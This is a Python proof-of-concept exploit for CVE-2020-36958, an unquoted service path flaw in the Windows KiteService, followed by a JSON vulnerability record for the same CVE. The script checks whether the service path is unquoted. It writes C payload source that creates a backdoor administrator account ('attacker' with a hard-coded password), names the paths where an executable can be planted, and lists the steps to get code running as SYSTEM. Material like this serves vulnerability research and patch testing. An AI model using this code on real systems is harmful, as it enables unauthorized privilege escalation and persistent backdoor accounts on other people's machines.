CVE-2020-36958

# CVE-2020-36958 PoC - KiteService Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in KiteService import os import sys import subprocess import shutil def check_vulnerability(): """Check if the system is vulnerable to CVE-2020-36958""" try: # Check if KiteService exists kite_service_path = r'C:\Program Files\Kite\KiteService.exe' if not os.path.exists(kite_service_path): print('[-] KiteService not found - target may not be vulnerable') return False # Check service configuration using sc command result = subprocess.run( ['sc', 'qc', 'KiteService'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: # Extract the binary path for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: print(f'[+] Service configuration found: {line.strip()}') # Check if path is unquoted (vulnerability exists) if '"' not in line and 'Program Files' in line: print('[+] VULNERABLE: Service path is unquoted!') return True else: print('[-] Service path is properly quoted') return False return False except Exception as e: print(f'[-] Error checking vulnerability: {e}') return False def create_elevated_payload(payload_path): """Create a malicious executable to be placed in unquoted path""" # This is a placeholder - in real attack, this would be malicious code malicious_code = f''' #include <windows.h> #include <stdio.h> int main() {{ printf("CVE-2020-36958 Payload Executed!\\n"); // Add malicious code here // This will run with SYSTEM privileges // Example: Create a new user with admin privileges system("net user attacker P@ssw0rd123 /add"); system("net localgroup Administrators attacker /add"); return 0; }} ''' with open(payload_path, 'w') as f: f.write(malicious_code) print(f'[+] Payload created at: {payload_path}') def main(): print('='*60) print('CVE-2020-36958 - KiteService Unquoted Service Path') print('='*60) if not check_vulnerability(): print('[-] Target is not vulnerable') return print('\n[!] This is for educational purposes only!') print('[!] Unauthorized access to computer systems is illegal.') # Potential injection points injection_points = [ r'C:\Program.exe', r'C:\Program Files\Kite.exe' ] print('\n[+] Potential injection points:') for point in injection_points: print(f' - {point}') print('\n[+] To demonstrate the vulnerability:') print(' 1. Place a malicious executable at one of the injection points') print(' 2. Restart the KiteService or reboot the system') print(' 3. The malicious code will execute with SYSTEM privileges') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2020-36958", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:26.663", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kite 1.2020.1119.0 contains an unquoted service path vulnerability in the KiteService Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files\\Kite\\KiteService.exe' to inject malicious executables and escalate privileges on the system."}, {"lang": "es", "value": "Kite 1.2020.1119.0 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio de Windows KiteService que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files\\Kite\\KiteService.exe' para inyectar ejecutables maliciosos y escalar privilegios en el sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49205", "source": "[email protected]"}, {"url": "https://www.kite.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/kite-kiteservice-unquoted-service-path", "source": "[email protected]"}]}}